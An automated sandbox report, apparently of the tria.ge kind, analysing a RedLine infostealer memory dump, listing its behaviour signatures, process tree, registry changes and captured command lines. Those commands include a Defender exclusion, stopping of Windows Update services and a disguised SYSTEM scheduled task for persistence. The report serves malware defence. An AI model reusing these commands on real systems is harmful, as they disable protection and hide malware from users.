Malware Analysis Report

2025-01-18 09:10

Sample ID 230810-w448eaab6x
Target 2636-63-0x0000000004180000-0x00000000041B4000-memory.dmp
SHA256 64ae95f87a315b58eed9b81f334ec34d7683d59e62dbf71269858206bfa45a5c
Tags
logsdiller cloud (tg: @logsdillabot) redline evasion infostealer spyware stealer themida persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

64ae95f87a315b58eed9b81f334ec34d7683d59e62dbf71269858206bfa45a5c

Threat Level: Known bad

The file 2636-63-0x0000000004180000-0x00000000041B4000-memory.dmp was found to be: Known bad.

Malicious Activity Summary

logsdiller cloud (tg: @logsdillabot) redline evasion infostealer spyware stealer themida persistence

RedLine

Redline family

Suspicious use of NtCreateUserProcessOtherParentProcess

Stops running service(s)

Drops file in Drivers directory

Downloads MZ/PE file

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Themida packer

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Suspicious behavior: LoadsDriver

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-10 18:29

Signatures

Redline family

redline

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-10 18:29

Reported

2023-08-10 18:32

Platform

win7-20230712-en

Max time kernel

101s

Max time network

149s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2344 created 1212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 2344 created 1212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 2344 created 1212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 2344 created 1212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 2344 created 1212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 612 set thread context of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2184 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2184 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2184 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2184 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3032 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3032 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3032 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3032 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2184 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2184 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2184 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2184 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1568 wrote to memory of 1540 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 1540 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 1540 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 2484 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 2484 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 2484 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 900 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 900 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 900 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1660 wrote to memory of 1756 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 1756 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 1756 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 1536 N/A C:\Windows\System32\powercfg.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 1536 N/A C:\Windows\System32\powercfg.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 1536 N/A C:\Windows\System32\powercfg.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 1740 N/A C:\Windows\System32\powercfg.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 1740 N/A C:\Windows\System32\powercfg.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 1740 N/A C:\Windows\System32\powercfg.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 2724 N/A C:\Windows\System32\powercfg.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 2724 N/A C:\Windows\System32\powercfg.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 2724 N/A C:\Windows\System32\powercfg.exe C:\Windows\System32\powercfg.exe
PID 612 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 612 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 612 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 612 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 612 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 612 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 612 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 612 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2452 wrote to memory of 2276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2452 wrote to memory of 2276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2452 wrote to memory of 2276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 612 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 612 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 612 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 612 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 612 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1444 wrote to memory of 1708 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 1444 wrote to memory of 1708 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 1444 wrote to memory of 1708 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 2184 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2184 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2184 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2184 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2804 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2804 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

